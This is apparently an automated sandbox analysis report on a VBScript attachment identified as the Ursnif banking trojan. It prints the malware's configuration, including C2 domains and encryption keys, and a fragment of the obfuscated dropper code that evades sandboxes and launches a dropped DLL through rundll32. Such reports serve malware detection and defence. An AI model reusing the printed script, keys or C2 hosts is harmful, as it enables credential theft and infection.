Loading ...

Play interactive tourEdit tour

Analysis Report Attachment_32954.vbs

Overview

General Information

Sample Name:Attachment_32954.vbs
Analysis ID:384531
MD5:39eb3427fd329de93a19190d84273710
SHA1:5d9009503b3500c0b6d35e272dd9160e9d873e46
SHA256:adf9ca509037dc8ae4090fa9fa92c8eee621a9860a00da566b25643aa8689799
Tags:vbs
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Deletes itself after installation
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found potential string decryption / allocating functions
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 5540 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Attachment_32954.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • rundll32.exe (PID: 6488 cmdline: 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
      • rundll32.exe (PID: 4072 cmdline: 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

Threatname: Ursnif

[{"RSA Public Key": "Xbs4Yk4n2aUcz4nAfmYBHRwWIvRHnuvNCkzGzFhWDffWAD6kAaz2nCrF+u1fBJy8EZGc5Sx4iFpGkK2Uml3/gsvcGmjbZA/KVSRirY7ISIz8qSDXCl7R7DH3QGwTH7G685n2r1rm1yDtD6HT1if24i3j6DsMpQyEccHcvxhbfoMgObXp5CGN5OHsQ+ytis2D"}, {"c2_domain": ["api10.laptok.at/api1", "golang.feel500.at/api1", "go.in100k.at/api1"], "botnet": "2200", "server": "730", "serpent_key": "hPdaZZCB2qcI31br", "sleep_time": "10", "SetWaitableTimer_value": "1"}]

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000014.00000003.404725066.0000000000BC0000.00000040.00000001.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    20.2.rundll32.exe.70250000.4.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
      20.3.rundll32.exe.bca25e.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security

        Sigma Overview

        No Sigma rule has matched

        Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: 20.2.rundll32.exe.48f94a0.3.raw.unpackMalware Configuration Extractor: Ursnif [{"RSA Public Key": "Xbs4Yk4n2aUcz4nAfmYBHRwWIvRHnuvNCkzGzFhWDffWAD6kAaz2nCrF+u1fBJy8EZGc5Sx4iFpGkK2Uml3/gsvcGmjbZA/KVSRirY7ISIz8qSDXCl7R7DH3QGwTH7G685n2r1rm1yDtD6HT1if24i3j6DsMpQyEccHcvxhbfoMgObXp5CGN5OHsQ+ytis2D"}, {"c2_domain": ["api10.laptok.at/api1", "golang.feel500.at/api1", "go.in100k.at/api1"], "botnet": "2200", "server": "730", "serpent_key": "hPdaZZCB2qcI31br", "sleep_time": "10", "SetWaitableTimer_value": "1"}]
        Multi AV Scanner detection for dropped fileShow sources
        Source: C:\Users\user\AppData\Local\Temp\Rabin.dmgVirustotal: Detection: 50%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\Rabin.dmgMetadefender: Detection: 25%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\Rabin.dmgReversingLabs: Detection: 72%
        Multi AV Scanner detection for submitted fileShow sources
        Source: Attachment_32954.vbsVirustotal: Detection: 36%Perma Link
        Source: Attachment_32954.vbsMetadefender: Detection: 16%Perma Link
        Source: Attachment_32954.vbsReversingLabs: Detection: 31%
        Source: Binary string: c:\Poorplay\halfUs\BoardFamous\outexperience\us.pdb source: wscript.exe, 00000001.00000003.339767368.000001DAF14EF000.00000004.00000001.sdmp, rundll32.exe, 00000014.00000002.473616478.00000000702AD000.00000002.00020000.sdmp, Rabin.dmg.1.dr
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_00DC3512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_702A088D FindFirstFileExW,
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\Temp
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.ini
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.ini
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local

        Key, Mouse, Clipboard, Microphone and Screen Capturing:

        barindex
        Yara detected UrsnifShow sources
        Source: Yara matchFile source: 00000014.00000003.404725066.0000000000BC0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 20.2.rundll32.exe.70250000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.rundll32.exe.bca25e.0.raw.unpack, type: UNPACKEDPE

        E-Banking Fraud:

        barindex
        Yara detected UrsnifShow sources
        Source: Yara matchFile source: 00000014.00000003.404725066.0000000000BC0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 20.2.rundll32.exe.70250000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.rundll32.exe.bca25e.0.raw.unpack, type: UNPACKEDPE
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_7025161B GetProcAddress,NtCreateSection,memset,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_702515D9 NtMapViewOfSection,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_702523C5 NtQueryVirtualMemory,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_00DC11A9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_00DCB159 NtQueryVirtualMemory,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_702521A4
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_00DC28E9
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_00DCAF34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_702A466E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_70290FE0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_702A7120
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_7029BA3F
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_702AA29E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_702AA3BE
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_702A75B8
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_7029B7DA
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_702AB7DF
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Rabin.dmg 94EB81BC58ADB976F21344D3EB273C9EB833AFBCADD121EB2AD38F1EF07A1F85
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 70294250 appears 39 times
        Source: Attachment_32954.vbsInitial sample: Strings found which are bigger than 50
        Source: Rabin.dmg.1.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: classification engineClassification label: mal92.troj.evad.winVBS@5/8@0/0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_00DC31DD CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,
        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\adobe.urlJump to behavior
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Attachment_32954.vbs'
        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer
        Source: Attachment_32954.vbsVirustotal: Detection: 36%
        Source: Attachment_32954.vbsMetadefender: Detection: 16%
        Source: Attachment_32954.vbsReversingLabs: Detection: 31%
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Attachment_32954.vbs'
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
        Source: Attachment_32954.vbsStatic file information: File size 1444626 > 1048576
        Source: Binary string: c:\Poorplay\halfUs\BoardFamous\outexperience\us.pdb source: wscript.exe, 00000001.00000003.339767368.000001DAF14EF000.00000004.00000001.sdmp, rundll32.exe, 00000014.00000002.473616478.00000000702AD000.00000002.00020000.sdmp, Rabin.dmg.1.dr

        Data Obfuscation:

        barindex
        VBScript performs obfuscated calls to suspicious functionsShow sources
        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Sleep 7000End With' pervasive glasswort corrector dinghy gander Oedipus mattress morrow Francis vibrato lawman Omaha pledge madstone grub ampersand heredity = 0REM age vex robe, maidservant midge presentation helm Klux racy Brahms judiciary, 1016749 barbarous recalcitrant grove = 1000Do While heredity < 100000000REM impetus Roth fudge souffle decorous Pravda inglorious calculate Paraguayan magnum repairmen Nassau If (heredity = 100000000) ThenWScript.Quit' KS decolletage Moiseyev nameable. Madeline Ellen script catastrophic hardwood Hankel tempest scriptural prime blab Hodges End IfIf (heredity = 5000000) Thengrove = grove + ((800 - 101.0) - ((66 + 3188.0) - 2655.0))End IfIf (heredity = 200) ThenExit DoEnd ifREM room Bohr. shard Germany nightmare standoff. 3540175 tetrahedron, 3863241 holler ailanthus spillover marriage stimulant lacrosse handicraftsman heredity = heredity + 1LoopREM shad eventide hour800 vicissitude Aeneas fledge reflectance bicep optimism enfant swirl, messieurs floorboard, Middletown Mira Ankara With WScript.Sleep 5000End WithEnd FunctionFunction hideout655()REM eyeball knack isomer chromatin Nassau692 Pangaea astonish. caliph, critic oedipal bravo If (InStr(WScript.ScriptName, "TESTING") > 0) ThenREM Iliad rennet manioc. visitor bootleg hart slaughterhouse, insurrect, 5691938 jejune clam exterior Rabin176 painstaking MsgBOX("RUN")Exit FunctionEnd Ifmoan("1")Set restaurant = CreateObject("WScript.Shell")restaurant.Run "rundll32" + " " + nepotism + "Rabin.dmg" + ",DllRegisterServer"prime623End FunctionFunction artful(dermatology, stagnant)Dim Byronic, deviateSet Byronic = CreateObject("Scripting.FileSystemObject")Set deviate = Byronic.CreateTextFile(dermatology, True)Dim pawpaw: pawpaw = (16 + (((78 + (-10.0)) - 36.0) + 252.0))Dim felsite506: felsite506 = (((54 + 4882.0) - (6837 - 1931.0)) + (-30.0))For Each soulful In stagnantREM Barr meteorite resonate cabdriver Lysenko sycophantic, 7200240 busywork tremendous facade xylophone locksmith inch RandomizeREM boggy255 tomography pander notebook. 7111724 contour strum period Reese Ouagadougou onrushing pathogenic fractionate = Int((pawpaw-felsite506+1)*Rnd+felsite506)If fractionate < (((90 + 1660.0) - (306 - 101.0)) - 1445.0) Thendeviate.WriteLine(soulful)ElseIf fractionate > (((73 - 20.0) + (31 + 3924.0)) - 3908.0) And fractionate < (((73 - 20.0) + (31 + 3924.0)) - 3908.0) Thendeviate.Write soulful + ":"Elsedeviate.Write soulfuldeviate.WriteBlankLines((((1304 - 545.0) - (27 + 8.0)) - 723.0))End IfNextdeviate.Close' baptism postdoctoral catalogue exclamatory layoff screenplay finny contact. linoleum Sagittarius downhill End FunctionFunction Gerhard()on error resume next' extensible Gibson spiderwort Datsun Barbara telemeter Costello Enoch. plume tribesmen jot sergeant mack Kirkland marriage649 Dim Aides: Set Aides = CreateObject("Scripting.FileSystemObject")' granular perspicacious Zanzibar indisposition oviform riverbank hasten. petunia kittenish tire gemsbok, 98142
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_70252193 push ecx; ret
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_70252140 push ecx; ret
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_00DCABF0 push ecx; ret
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_00DCAF23 push ecx; ret
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_70264AB7 push ebx; ret
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_70265B21 push edi; ret
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_70266BBB push ebx; retf
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_702ABF08 push ecx; ret
        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\Rabin.dmgJump to dropped file
        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\Rabin.dmgJump to dropped file

        Hooking and other Techniques for Hiding and Protection:

        barindex
        Yara detected UrsnifShow sources
        Source: Yara matchFile source: 00000014.00000003.404725066.0000000000BC0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 20.2.rundll32.exe.70250000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.rundll32.exe.bca25e.0.raw.unpack, type: UNPACKEDPE
        Deletes itself after installationShow sources
        Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\attachment_32954.vbsJump to behavior
        Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
        Source: C:\Windows\System32\wscript.exe TID: 4120Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformation
        Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_00DC3512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_702A088D FindFirstFileExW,
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\Temp
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.ini
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.ini
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_7029FAB7 IsDebuggerPresent,OutputDebugStringW,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_702A0417 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_702A045B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_702A048C mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_70299DD7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_702C204F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_702C1C56 push dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_702C2390 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_7029400F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_70294667 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_70299747 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        Benign windows process drops PE filesShow sources
        Source: C:\Windows\System32\wscript.exeFile created: Rabin.dmg.1.drJump to dropped file
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer
        Source: rundll32.exe, 00000014.00000002.470567376.0000000002FE0000.00000002.00000001.sdmpBinary or memory string: Program Manager
        Source: rundll32.exe, 00000014.00000002.470567376.0000000002FE0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
        Source: rundll32.exe, 00000014.00000002.470567376.0000000002FE0000.00000002.00000001.sdmpBinary or memory string: Progman
        Source: rundll32.exe, 00000014.00000002.470567376.0000000002FE0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_00DCA12A cpuid
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoEx,GetLocaleInfoW,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesEx,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
        Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
        Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation
        Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation
        Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation
        Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation
        Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation
        Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation
        Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation
        Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation
        Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation
        Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation
        Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_7025116D GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_00DCA12A wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_70251756 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information:

        barindex
        Yara detected UrsnifShow sources
        Source: Yara matchFile source: 00000014.00000003.404725066.0000000000BC0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 20.2.rundll32.exe.70250000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.rundll32.exe.bca25e.0.raw.unpack, type: UNPACKEDPE

        Remote Access Functionality:

        barindex
        Yara detected UrsnifShow sources
        Source: Yara matchFile source: 00000014.00000003.404725066.0000000000BC0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 20.2.rundll32.exe.70250000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.rundll32.exe.bca25e.0.raw.unpack, type: UNPACKEDPE

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsScripting121Path InterceptionProcess Injection12Masquerading1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsExploitation for Client Execution1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion2LSASS MemoryQuery Registry1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerSecurity Software Discovery12SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSVirtualization/Sandbox Evasion2Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting121LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsAccount Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRundll321DCSyncSystem Owner/User Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing1Proc FilesystemFile and Directory Discovery3Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)File Deletion1/etc/passwd and /etc/shadowSystem Information Discovery45Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        Attachment_32954.vbs37%VirustotalBrowse
        Attachment_32954.vbs17%MetadefenderBrowse
        Attachment_32954.vbs31%ReversingLabsScript-WScript.Trojan.Banker

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\Rabin.dmg51%VirustotalBrowse
        C:\Users\user\AppData\Local\Temp\Rabin.dmg25%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\Rabin.dmg72%ReversingLabsWin32.Trojan.Tnega

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        20.2.rundll32.exe.dc0000.2.unpack100%AviraHEUR/AGEN.1108168Download File

        Domains

        No Antivirus matches

        URLs

        No Antivirus matches

        Domains and IPs

        Contacted Domains

        No contacted domains info

        Contacted IPs

        No contacted IP infos

        General Information

        Joe Sandbox Version:31.0.0 Emerald
        Analysis ID:384531
        Start date:09.04.2021
        Start time:11:43:12
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 5m 55s
        Hypervisor based Inspection enabled:false
        Report type:light
        Sample file name:Attachment_32954.vbs
        Cookbook file name:default.jbs
